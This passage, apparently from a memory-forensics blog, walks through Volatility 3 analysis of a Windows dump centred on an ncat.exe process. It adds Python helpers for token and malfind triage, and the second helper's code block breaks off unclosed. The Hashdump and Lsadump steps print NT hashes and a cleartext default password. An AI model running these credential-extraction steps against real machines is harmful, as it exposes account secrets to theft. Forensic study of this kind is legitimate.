<span style="color: white;">4260 ncat.exe 0x14a4810 VENDORED_BUILD windows.1</span>
<span style="color: white;">4260 ncat.exe 0x14a4810 VENDORED_MAJOR 2</span>
<span style="color: white;">4260 ncat.exe 0x14a4810 VENDORED_MINOR 29</span>
<span style="color: white;">4260 ncat.exe 0x14a4810 VENDORED_PATCH 1</span>
<span style="color: white;">4260 ncat.exe 0x14a4810 verbose_output 0</span>
<span style="color: white;">...</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
</div><p>Getting information on the user and the permissions the <i>ncat.exe</i> process is running with.</p><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿securitynik)-[~/mem_samples]</span>
<span><span style="color: white;">└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp </span><b><span style="color: #fcff01;">windows.getsids.GetSIDs --pid 4260 </span></b><span style="color: white;"> </span></span>
<span style="color: white;">Volatility 3 Framework 2.0.2</span>
<span style="color: white;">Progress: 100.00 PDB scanning finished </span>
<span style="color: white;">PID Process SID Name</span>
<span><span style="color: white;">4260 ncat.exe S-1-5-21-3036856633-148622980-1367235899-1001 </span><b><span style="color: #fcff01;">SecurityNik</span></b></span>
<span><span style="color: white;">4260 ncat.exe S-1-5-21-3036856633-148622980-1367235899-513 </span><b><span style="color: #fcff01;">Domain Users</span></b></span>
<span style="color: white;">4260 ncat.exe S-1-1-0 Everyone</span>
<span><span style="color: white;">4260 ncat.exe S-1-5-114 </span><b><span style="color: #fcff01;">Local Account (Member of Administrators)</span></b></span>
<span><span style="color: white;">4260 ncat.exe S-1-5-32-544 </span><b><span style="color: #fcff01;">Administrators</span></b></span>
<span style="color: white;">4260 ncat.exe S-1-5-32-545 Users</span>
<span style="color: white;">4260 ncat.exe S-1-5-4 Interactive</span>
<span style="color: white;">4260 ncat.exe S-1-2-1 Console Logon (Users who are logged onto the physical console)</span>
<span style="color: white;">4260 ncat.exe S-1-5-11 Authenticated Users</span>
<span style="color: white;">4260 ncat.exe S-1-5-15 This Organization</span>
<span style="color: white;">4260 ncat.exe S-1-5-113 Local Account</span>
<span style="color: white;">4260 ncat.exe S-1-5-5-0-184823 Logon Session</span>
<span style="color: white;">4260 ncat.exe S-1-2-0 Local (Users with the ability to log in locally)</span>
<span style="color: white;">4260 ncat.exe S-1-5-64-10 NTLM Authentication</span>
<span><span style="color: white;">4260 ncat.exe S-1-16-12288 </span><b><span style="color: #fcff01;">High Mandatory Level</span></b></span>
</pre></div>
</div><div><br /></div><div><div>Above, we see the user is <i>SecurityNik</i> and is also a member of the local Administrators group. Additionally, <i>ncat.exe</i> is running at <i>High Mandatory Level</i>, i.e. high integrity.</div><div><br /></div><div>Taking a deeper look at the privileges.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿securitynik)-[~/mem_samples]</span>
<span><span style="color: white;">└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp </span><b><span style="color: #fcff01;">windows.privileges.Privs --pid 4260</span></b><span style="color: white;"> </span></span>
<span style="color: white;">Volatility 3 Framework 2.0.2</span>
<span style="color: white;">Progress: 100.00 PDB scanning finished </span>
<span style="color: white;">PID Process Value Privilege Attributes Description</span>
<span style="color: white;">4260 ncat.exe 2 SeCreateTokenPrivilege Create a token object</span>
<span style="color: white;">4260 ncat.exe 3 SeAssignPrimaryTokenPrivilege Replace a process-level token</span>
<span style="color: white;">4260 ncat.exe 4 SeLockMemoryPrivilege Lock pages in memory</span>
<span style="color: white;">4260 ncat.exe 5 SeIncreaseQuotaPrivilege Present Increase quotas</span>
<span style="color: white;">4260 ncat.exe 6 SeMachineAccountPrivilege Add workstations to the domain</span>
<span style="color: white;">4260 ncat.exe 7 SeTcbPrivilege Act as part of the operating system</span>
<span style="color: white;">4260 ncat.exe 8 SeSecurityPrivilege Present Manage auditing and security log</span>
<span style="color: white;">4260 ncat.exe 9 SeTakeOwnershipPrivilege Present Take ownership of files/objects</span>
<span style="color: white;">4260 ncat.exe 10 SeLoadDriverPrivilege Present Load and unload device drivers</span>
<span style="color: white;">4260 ncat.exe 11 SeSystemProfilePrivilege Present Profile system performance</span>
<span style="color: white;">4260 ncat.exe 12 SeSystemtimePrivilege Present Change the system time</span>
<span style="color: white;">4260 ncat.exe 13 SeProfileSingleProcessPrivilege Present Profile a single process</span>
<span style="color: white;">4260 ncat.exe 14 SeIncreaseBasePriorityPrivilege Present Increase scheduling priority</span>
<span style="color: white;">4260 ncat.exe 15 SeCreatePagefilePrivilege Present Create a pagefile</span>
<span style="color: white;">4260 ncat.exe 16 SeCreatePermanentPrivilege Create permanent shared objects</span>
<span style="color: white;">4260 ncat.exe 17 SeBackupPrivilege Present Backup files and directories</span>
<span style="color: white;">4260 ncat.exe 18 SeRestorePrivilege Present Restore files and directories</span>
<span style="color: white;">4260 ncat.exe 19 SeShutdownPrivilege Present Shut down the system</span>
<span style="color: white;">4260 ncat.exe 20 SeDebugPrivilege Present Debug programs</span>
<span style="color: white;">4260 ncat.exe 21 SeAuditPrivilege Generate security audits</span>
<span style="color: white;">4260 ncat.exe 22 SeSystemEnvironmentPrivilege Present Edit firmware environment values</span>
<span style="color: white;">4260 ncat.exe 23 SeChangeNotifyPrivilege Present,Enabled,Default Receive notifications of changes to files or directories</span>
<span style="color: white;">4260 ncat.exe 24 SeRemoteShutdownPrivilege Present Force shutdown from a remote system</span>
<span style="color: white;">4260 ncat.exe 25 SeUndockPrivilege Present Remove computer from docking station</span>
<span style="color: white;">4260 ncat.exe 26 SeSyncAgentPrivilege Synch directory service data</span>
<span style="color: white;">4260 ncat.exe 27 SeEnableDelegationPrivilege Enable user accounts to be trusted for delegation</span>
<span style="color: white;">4260 ncat.exe 28 SeManageVolumePrivilege Present Manage the files on a volume</span>
<span style="color: white;">4260 ncat.exe 29 SeImpersonatePrivilege Present,Enabled,Default Impersonate a client after authentication</span>
<span style="color: white;">4260 ncat.exe 30 SeCreateGlobalPrivilege Present,Enabled,Default Create global objects</span>
<span style="color: white;">4260 ncat.exe 31 SeTrustedCredManAccessPrivilege Access Credential Manager as a trusted caller</span>
<span style="color: white;">4260 ncat.exe 32 SeRelabelPrivilege Modify the mandatory integrity level of an object</span>
<span style="color: white;">4260 ncat.exe 33 SeIncreaseWorkingSetPrivilege Present Allocate more memory for user applications</span>
<span style="color: white;">4260 ncat.exe 34 SeTimeZonePrivilege Present Adjust the time zone of the computer's internal clock</span>
<span style="color: white;">4260 ncat.exe 35 SeCreateSymbolicLinkPrivilege Present Required to create a symbolic link</span>
<span style="color: white;">4260 ncat.exe 36 SeDelegateSessionUserImpersonatePrivilege Present Obtain an impersonation token for another user in the same session.</span>
</pre></div>
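<p>As an added example (not part of the original post), the following Python combines the GetSIDs and Privs output above into one token summary: integrity level from the S-1-16 SID, membership in the local Administrators group, and which privileges are merely Present versus actually Enabled. The sample text is a constructed subset of the output for PID 4260.</p>

```python
"""Summarize a process token from the windows.getsids.GetSIDs and
windows.privileges.Privs output shown above.  Added example, not part of the
original post; SAMPLE_SIDS and SAMPLE_PRIVS are a constructed subset of
that output."""
import re

# S-1-16-<RID> mandatory-label SIDs -> integrity level
INTEGRITY = {0: "Untrusted", 4096: "Low", 8192: "Medium", 8448: "Medium Plus",
             12288: "High", 16384: "System", 20480: "Protected Process"}
ADMINISTRATORS_SID = "S-1-5-32-544"
ATTR_WORDS = {"Present", "Enabled", "Default"}
# Privileges worth a second look when Present on an interactive user process
NOTABLE = {"SeDebugPrivilege", "SeTcbPrivilege", "SeBackupPrivilege",
           "SeRestorePrivilege", "SeLoadDriverPrivilege",
           "SeTakeOwnershipPrivilege", "SeImpersonatePrivilege",
           "SeCreateTokenPrivilege", "SeAssignPrimaryTokenPrivilege"}

# Constructed subset of the GetSIDs / Privs output for PID 4260 above
SAMPLE_SIDS = """\
PID Process SID Name
4260 ncat.exe S-1-5-21-3036856633-148622980-1367235899-1001 SecurityNik
4260 ncat.exe S-1-5-21-3036856633-148622980-1367235899-513 Domain Users
4260 ncat.exe S-1-5-32-544 Administrators
4260 ncat.exe S-1-5-32-545 Users
4260 ncat.exe S-1-5-5-0-184823 Logon Session
4260 ncat.exe S-1-16-12288 High Mandatory Level
"""
SAMPLE_PRIVS = """\
PID Process Value Privilege Attributes Description
4260 ncat.exe 2 SeCreateTokenPrivilege Create a token object
4260 ncat.exe 7 SeTcbPrivilege Act as part of the operating system
4260 ncat.exe 17 SeBackupPrivilege Present Backup files and directories
4260 ncat.exe 20 SeDebugPrivilege Present Debug programs
4260 ncat.exe 23 SeChangeNotifyPrivilege Present,Enabled,Default Receive notifications of changes to files or directories
4260 ncat.exe 29 SeImpersonatePrivilege Present,Enabled,Default Impersonate a client after authentication
4260 ncat.exe 33 SeIncreaseWorkingSetPrivilege Present Allocate more memory for user applications
"""


def parse_sids(text: str, pid: int) -> dict:
    """Map SID -> name for one PID. Names may contain spaces ("Domain Users"),
    so split at most three times and keep the remainder as the name."""
    sids = {}
    for line in text.splitlines():
        parts = line.split(maxsplit=3)
        if len(parts) < 3 or parts[0] != str(pid):
            continue
        sids[parts[2]] = parts[3] if len(parts) == 4 else ""
    return sids


def parse_privs(text: str, pid: int) -> dict:
    """Map privilege name -> set of attributes for one PID. Privs prints the
    Attributes column only when the privilege is in the token, so the fifth
    token is either 'Present[,Enabled[,Default]]' or the first word of the
    description."""
    privs = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4 or parts[0] != str(pid):
            continue
        attrs = set()
        if len(parts) > 4 and parts[4].split(",")[0] in ATTR_WORDS:
            attrs = set(parts[4].split(","))
        privs[parts[3]] = attrs
    return privs


def summarize_token(sids_text: str, privs_text: str, pid: int) -> dict:
    """Combine both plugin outputs into the facts an analyst wants first:
    who the token belongs to, its integrity level, whether it carries the
    local Administrators group, and which privileges are present/enabled."""
    sids = parse_sids(sids_text, pid)
    privs = parse_privs(privs_text, pid)
    integrity = "unknown"
    for sid in sids:
        m = re.fullmatch(r"S-1-16-(\d+)", sid)
        if m:
            integrity = INTEGRITY.get(int(m.group(1)), "RID " + m.group(1))
    # GetSIDs lists the token's user SID first, then the group SIDs
    user_sid = next(iter(sids), None)
    # "Present" is the set a process could enable at any time via
    # AdjustTokenPrivileges; "Enabled" is what it is using right now.
    present = sorted(p for p, a in privs.items() if "Present" in a)
    enabled = sorted(p for p, a in privs.items() if "Enabled" in a)
    return {
        "user": (user_sid, sids.get(user_sid, "")),
        "integrity": integrity,
        "admin_member": ADMINISTRATORS_SID in sids,
        "present": present,
        "enabled": enabled,
        "notable_present": sorted(NOTABLE.intersection(present)),
    }


if __name__ == "__main__":
    import json
    print(json.dumps(summarize_token(SAMPLE_SIDS, SAMPLE_PRIVS, 4260), indent=2))
```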
</div><div><br /></div><div><div>Quite a lot of privileges. This helps confirm what we saw above: the process is running with high integrity.</div><div><br /></div><div>Looking at the handles the <i>ncat.exe</i> process has open.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿securitynik)-[~/mem_samples]</span>
<span><span style="color: white;">└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp </span><b><span style="color: #fcff01;">windows.handles.Handles --pid 4260</span></b></span>
<span style="color: white;">Volatility 3 Framework 2.0.2</span>
<span style="color: white;">Progress: 100.00 PDB scanning finished </span>
<span style="color: white;">PID Process Offset HandleValue Type GrantedAccess Name</span>
<span style="color: white;">...</span>
<span style="color: white;">4260 ncat.exe 0xd187c1e33d30 0x94 File 0x100020 \Device\HarddiskVolume2\Users\SecurityNik</span>
<span style="color: white;">...</span>
<span style="color: white;">4260 ncat.exe 0xd187c13b76e0 0x1f8 Event 0x1f0003</span>
<span style="color: white;">4260 ncat.exe 0xd187c1e34690 0x1fc File 0x120089 \Device\NamedPipe\</span>
<span style="color: white;">4260 ncat.exe 0xd187c1e34500 0x204 File 0x120196 \Device\NamedPipe</span>
<span style="color: white;">4260 ncat.exe 0xd187c1e34820 0x208 File 0x120089 \Device\NamedPipe\ncat-0</span>
<span style="color: white;">4260 ncat.exe 0xd187c10dd400 0x210 Mutant 0x1f0001</span>
<span style="color: white;">4260 ncat.exe 0xd187c1bc6080 0x214 Process 0x1fffff ncat.exe Pid 4500</span>
<span style="color: white;">...</span>
<span style="color: white;">USER\S-1-5-21-3036856633-148622980-1367235899-1001\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION</span>
<span style="color: white;">4260 ncat.exe 0xd187c1f5ef60 0x228 Event 0x1f0003</span>
<span style="color: white;">4260 ncat.exe 0xd187c13b8de0 0x22c Event 0x1f0003</span>
</pre></div>
</div><div><br /></div><div><div>Let's now extract any credentials from the host using <i>hashdump</i>.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿securitynik)-[~/mem_samples]</span>
<span style="color: white;">└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp </span><span style="color: #fcff01;"><b>windows.hashdump.Hashdump</b></span>
<span style="color: white;">Volatility 3 Framework 2.0.2</span>
<span style="color: white;">Progress: 100.00 PDB scanning finished </span>
<span style="color: white;">User <span> </span><span> <span> </span></span>rid lmhash <span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span>nthash</span>
<span style="color: white;">Administrator <span> </span>500 aad3b435b51404eeaad3b435b51404ee 31d6cfe0d16ae931b73c59d7e0c089c0</span>
<span style="color: white;">Guest <span> </span><span> <span> </span></span>501 aad3b435b51404eeaad3b435b51404ee 31d6cfe0d16ae931b73c59d7e0c089c0</span>
<span style="color: white;">DefaultAccount <span> </span>503 aad3b435b51404eeaad3b435b51404ee 31d6cfe0d16ae931b73c59d7e0c089c0</span>
<span style="color: white;">WDAGUtilityAccount 504 aad3b435b51404eeaad3b435b51404ee c2622233208f902795d9ad5bde22b628</span>
<span><span style="color: white;">SecurityNik </span><span style="color: white;"> </span><span style="color: white;">1001 aad3b435b51404eeaad3b435b51404ee </span><b><span style="color: #fcff01;">23e1d10001876b0078a9a779017fc026</span></b></span>
</pre></div>
</div><div><br /></div><div><div><div>Looking for credentials in the<i> lsass.exe </i>process.</div><div><br /></div></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿securitynik)-[~/mem_samples]</span>
<span><span style="color: white;">└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp </span><b><span style="color: #fcff01;">windows.lsadump.Lsadump</span></b></span>
<span style="color: white;">Volatility 3 Framework 2.0.2</span>
<span style="color: white;">Progress: 100.00 PDB scanning finished </span>
<span style="color: white;">Key <span> </span><span> <span> </span></span>Secret <span> </span><span> </span><span> </span><span> </span><span> <span> </span><span> </span><span> </span><span> </span><span> </span></span>Hex</span>
<span><span style="color: white;">DefaultPassword </span><span style="color: white;"> </span><span style="color: #fcff01;"><b>Testing1</b></span></span><span style="color: white;">%òvÌBhúmÃfTî <span> </span><span> </span><span> </span><span> </span><span> <span> </span></span>10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 00 65 00 73 00 74 00 69 00 6e 00 67 00 31 00 25 f2 1f 76 83 cc a0 08 42 68 fa 6d c3 66 54 ee</span>
<span style="color: white;">DPAPI_SYSTEM <span> </span>,ÀC³▒N#0t"íãܺÈÕÿs/É▒I[ÌÕؤqôUMn <span> <span> </span></span>2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 c0 43 b3 1a 05 9e 4e 23 30 74 22 9b e6 ed e3 dc ba c8 1d d5 ff 73 9c 2f c9 1a 49 0f 5b cc d5 d8 7f a4 94 71 f4 55 4d 6e 00 00 00 00</span>
<span style="color: white;">L$_RasConnectionCredentials#0 88[`Þ6Ù5N½Â§^)n</span><span style="color: #fcff01;"><b>Testing1</b></span><span style="color: white;"> <span> </span><span> <span> </span></span>38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 05 00 5b 60 de 36 d9 98 35 4e bd c2 a7 15 5e 81 29 6e 12 00 00 00 54 00 65 00 73 00 74 00 69 00 6e 00 67 00 31 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00</span>
<span style="color: white;">NL$KM @×çs¶o(ôÛQÙSGÔÀÙ²7e¿Â¡Û#jåh®X8'c`:Aݤ¨u¹▒7=ÁéqÆÿÿC}ºR5uù 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d7 e7 ad 73 b6 6f 28 f4 db 51 12 d9 53 47 86 d4 0f c0 d9 b2 37 65 bf 53 97 08 c2 a1 db 23 9f 6a e5 9d 68 ae 9c 9a 58 0e 38 27 63 60 05 06 3a 85 88 41 dd 1b 21 16 1b 75 8a a4 a8 75 b9 18 37 3d 16 c1 e9 10 71 c6 ff ff 43 7d ba 06 52 35 75 f9</span>
</pre></div>
</div><div><br /></div><div><br /></div><div>Looking to see what version information can be extracted.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿securitynik)-[~/mem_samples]</span>
<span><span style="color: white;">└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp </span><b><span style="color: #fcff01;">windows.verinfo.VerInfo</span></b><span style="color: white;"> | more</span></span>
<span style="color: white;">Volatility 3 Framework 2.0.2 PDB scanning finished </span>
<span style="color: white;">PID Process Base Name Major Minor Product Build</span>
<span style="color: white;">...</span>
<span style="color: white;">4260 ncat.exe 0x730000 ncat.exe - - - -</span>
<span style="color: white;">4260 ncat.exe 0x7ffe2ab70000 ntdll.dll - - - -</span>
<span style="color: white;">4260 ncat.exe 0x7ffe2a810000 wow64.dll - - - -</span>
<span style="color: white;">4260 ncat.exe 0x7ffe29950000 wow64win.dll - - - -</span>
<span style="color: white;">4260 ncat.exe 0x771d0000 wow64cpu.dll - - - -</span>
<span style="color: white;">...</span>
</pre></div>
</div><div><br /></div><div><div>Nothing interesting above.</div><div><br /></div><div>Taking a look at the Virtual Address Descriptors (VADs).</div></div><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿securitynik)-[~/mem_samples]</span>
<span><span style="color: white;">└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp </span><b><span style="color: #fcff01;">windows.vadinfo.VadInfo --pid 4260</span></b><span style="color: white;"> </span></span>
<span style="color: white;">Volatility 3 Framework 2.0.2</span>
<span style="color: white;">Progress: 100.00 PDB scanning finished </span>
<span style="color: white;">PID Process Offset Start VPN End VPN Tag Protection CommitCharge PrivateMemory Parent File File output</span>
<span style="color: white;">4260 ncat.exe 0xd187bfeeaad0 0x75c20000 0x75e33fff Vad PAGE_EXECUTE_WRITECOPY 28 0 0x0 \Windows\SysWOW64\KernelBase.dll Disabled</span>
<span style="color: white;">4260 ncat.exe 0xd187c1c83e40 0x14a0000 0x14affff VadS PAGE_READWRITE 11 1 0xffffd187bfeeaad0 N/A Disabled</span>
<span style="color: white;">...</span>
<span style="color: white;">4260 ncat.exe 0xd187c1fac350 0x730000 0x8d0fff Vad PAGE_EXECUTE_WRITECOPY 18 0 0xffffd187bfeeac10 \ProgramData\chocolatey\lib\ncat.flare\tools\ncat-portable-5.59BETA1\ncat.exe Disabled</span>
<span style="color: white;">...</span>
<span style="color: white;"> 0xffffd187c01f7a60 \Windows\SysWOW64\pcapwsp.dll Disabled</span>
<span style="color: white;">4260 ncat.exe 0xd187c01f8050 0x3d40000 0x3e3ffff VadS PAGE_READWRITE 4 1 0xffffd187bceac5a0 N/A Disabled</span>
<span style="color: white;">...</span>
<span style="color: white;">4260 ncat.exe 0xd187c1c7cc30 0x7ffe7000 0x7ffe7fff VadS PAGE_READONLY 1 1 0xffffd187c1fb03b0 N/A Disabled</span>
<span style="color: white;">4260 ncat.exe 0xd187c1c82e00 0x7f290000 0x7f291fff VadS PAGE_READWRITE 1 1 0xffffd187c1c7cc30 N/A Disabled</span>
<span style="color: white;">4260 ncat.exe 0xd187bfeedc30 0x7f150000 0x7f24ffff Vad PAGE_READONLY 0 0 0xffffd187c1c82e00 N/A Disabled</span>
<span style="color: white;">4260 ncat.exe 0xd187c158d7d0 0x7e110000 0x7e17afff Vad PAGE_EXECUTE_WRITECOPY 18 0 </span>
<span style="color: white;">...</span>
<span style="color: white;">4260 ncat.exe 0xd187c1faf730 0x7ffe2ab70000 0x7ffe2ad64fff Vad PAGE_EXECUTE_WRITECOPY 16 0 0xffffd187c10da7f0 \Windows\System32\ntdll.dll Disabled</span>
<span style="color: white;">.......</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Getting information on existing services.</p><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿securitynik)-[~/mem_samples]</span>
<span style="color: white;">└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp </span><span style="color: #fcff01;"><b>windows.svcscan.SvcScan</b></span><span style="color: white;"> | more </span>
<span style="color: white;">Volatility 3 Framework 2.0.2 PDB scanning finished </span>
<span style="color: white;">Offset Order PID Start State Type Name Display Binary</span>
<span style="color: white;">0x1887f463cf0 399 0 SERVICE_AUTO_START SERVICE_RUNNING SERVICE_WIN32_SHARE_PROCESS RpcEptMapper RPC Endpoint Mapper -</span>
<span style="color: white;">0x1887f463d00 398 N/A SERVICE_DEMAND_START SERVICE_STOPPED SERVICE_WIN32_OWN_PROCESS rpcapd rpcapd N/A</span>
<span style="color: white;">0x1887f463960 397 N/A SERVICE_DEMAND_START SERVICE_STOPPED SERVICE_WIN32_SHARE_PROCESS RmSvc RmSvc N/A</span>
<span style="color: white;">0x1887f463ed0 396 N/A SERVICE_DEMAND_START SERVICE_STOPPED SERVICE_KERNEL_DRIVER rhproxy rhproxy N/A</span>
<span style="color: white;">0x1887f468b10 395 N/A SERVICE_DEMAND_START SERVICE_STOPPED SERVICE_KERNEL_DRIVER RFCOMM RFCOMM N/A</span>
<span style="color: white;">...</span>
</pre></div>
</div><div><br /></div><div><div>... and additional information on the services</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿securitynik)-[~/mem_samples]</span>
<span><span style="color: white;">└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp </span><b><span style="color: #fcff01;">windows.getservicesids.GetServiceSIDs</span></b><span style="color: white;"> | more </span></span>
<span style="color: white;">Volatility 3 Framework 2.0.2 PDB scanning finished </span>
<span style="color: white;">SID Service</span>
<span style="color: white;">S-1-5-80-4151353957-356578678-4163131872-800126167-2037860865 .NET CLR Networking 4.0.0.0</span>
<span style="color: white;">S-1-5-80-1135273183-3738781202-689480478-891280274-255333391 .NET Memory Cache 4.0</span>
<span style="color: white;">S-1-5-80-3459415445-2224257447-3423677131-2829651752-4257665947 3ware</span>
<span style="color: white;">S-1-5-80-2917441881-3404282297-3983348447-1829381237-2935805708 AarSvc</span>
<span style="color: white;">S-1-5-80-1925620318-959733373-4030606672-1109042073-4287256036 AarSvc_2ea6a</span>
<span style="color: white;">S-1-5-80-1975967573-2913356537-819030703-3730719923-1995772179 AcpiDev</span>
<span style="color: white;">S-1-5-80-2670625634-2386107419-4204951937-4094372046-2600379021 acpiex</span>
<span style="color: white;">S-1-5-80-3267050047-1503497915-401953950-2662906978-1179039408 acpipagr</span>
<span style="color: white;">....</span>
</pre></div>
</div><div><br /></div><div><div><div>Leveraging the <i>malfind</i> plugin to look for injected code, i.e. private memory regions that are executable and writable but not backed by a file on disk.</div></div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿securitynik)-[~/mem_samples]</span>
<span style="color: white;">└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.malfind.Malfind --pid 4260</span>
<span style="color: white;">Volatility 3 Framework 2.0.2</span>
<span style="color: white;">Progress: 100.00 PDB scanning finished </span>
<span style="color: white;">PID Process Start VPN End VPN Tag Protection CommitCharge PrivateMemory File output Hexdump Disasm</span>
<span style="color: white;">4260 ncat.exe 0xf40000 0xf40fff VadS PAGE_EXECUTE_READWRITE|PAGE_NOCACHE 1 1 Disabled</span>
<span style="color: white;">68 90 4f 25 77 9c 60 68 h.O%w.`h</span>
<span style="color: white;">14 00 f4 00 e8 5f b7 e0 ....._..</span>
<span style="color: white;">74 61 9d c3 43 00 3a 00 ta..C.:.</span>
<span style="color: white;">5c 00 54 00 6f 00 6f 00 \.T.o.o.</span>
<span style="color: white;">6c 00 73 00 5c 00 43 00 l.s.\.C.</span>
<span style="color: white;">6d 00 64 00 65 00 72 00 m.d.e.r.</span>
<span style="color: white;">5c 00 76 00 65 00 6e 00 \.v.e.n.</span>
<span style="color: white;">64 00 6f 00 72 00 5c 00 d.o.r.\.</span>
<span style="color: white;">0xf40000: push 0x77254f90</span>
<span style="color: white;">0xf40005: pushfd</span>
<span style="color: white;">0xf40006: pushal</span>
<span style="color: white;">0xf40007: push 0xf40014</span>
<span style="color: white;">0xf4000c: call 0x75d4b770</span>
<span style="color: white;">...</span>
</pre></div>
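<p>As an added example (not from the original post), the following Python rebuilds the bytes from the malfind hexdump above, checks whether the region starts with an MZ header, and recovers any ASCII or UTF-16LE strings; the sample is a constructed copy of the rows shown, and the Cmder path it recovers matches the <i>user_aliases</i> entry seen in the process environment earlier.</p>

```python
"""Triage helper for a windows.malfind.Malfind hit: rebuild the bytes from the
hexdump rows the plugin prints, check whether the region starts with a PE
header, and pull out ASCII and UTF-16LE strings.  Added example, not from
the original post; SAMPLE_HEXDUMP is a constructed copy of the rows above."""
import re

# Constructed copy of the malfind hexdump for the 0xf40000 region above
SAMPLE_HEXDUMP = r"""
68 90 4f 25 77 9c 60 68 h.O%w.`h
14 00 f4 00 e8 5f b7 e0 ....._..
74 61 9d c3 43 00 3a 00 ta..C.:.
5c 00 54 00 6f 00 6f 00 \.T.o.o.
6c 00 73 00 5c 00 43 00 l.s.\.C.
6d 00 64 00 65 00 72 00 m.d.e.r.
5c 00 76 00 65 00 6e 00 \.v.e.n.
64 00 6f 00 72 00 5c 00 d.o.r.\.
"""
HEX_BYTE = re.compile(r"^[0-9a-fA-F]{2}$")


def parse_hexdump(text: str) -> bytes:
    """Rebuild raw bytes from rows of 'xx xx ... ascii'. Only the leading run
    of two-character hex tokens is taken and the ASCII column is ignored; an
    ASCII column that happens to begin with a space-separated hex pair would
    be over-read, which malfind's short rows make unlikely."""
    out = bytearray()
    for line in text.splitlines():
        for tok in line.split()[:16]:
            if not HEX_BYTE.match(tok):
                break
            out.append(int(tok, 16))
    return bytes(out)


def looks_like_pe(data: bytes) -> bool:
    """A region that starts with an MZ header is a whole image mapped into
    private memory; a few bytes of code (like the push/call stub above) is
    something else, e.g. a hook trampoline, and needs a closer look."""
    return data[:2] == b"MZ"


def ascii_strings(data: bytes, min_len: int = 4) -> list:
    return [m.group().decode("ascii")
            for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data)]


def utf16le_strings(data: bytes, min_len: int = 4) -> list:
    # Printable ASCII code unit followed by a NUL high byte, repeated
    pat = rb"(?:[\x20-\x7e]\x00){%d,}" % min_len
    return [m.group().decode("utf-16-le") for m in re.finditer(pat, data)]


def triage(text: str) -> dict:
    """One-shot summary of a hexdump: size, leading bytes, PE check, strings."""
    data = parse_hexdump(text)
    return {
        "size": len(data),
        "first_bytes": data[:8].hex(" "),
        "looks_like_pe": looks_like_pe(data),
        "ascii": ascii_strings(data),
        "utf16le": utf16le_strings(data),
    }


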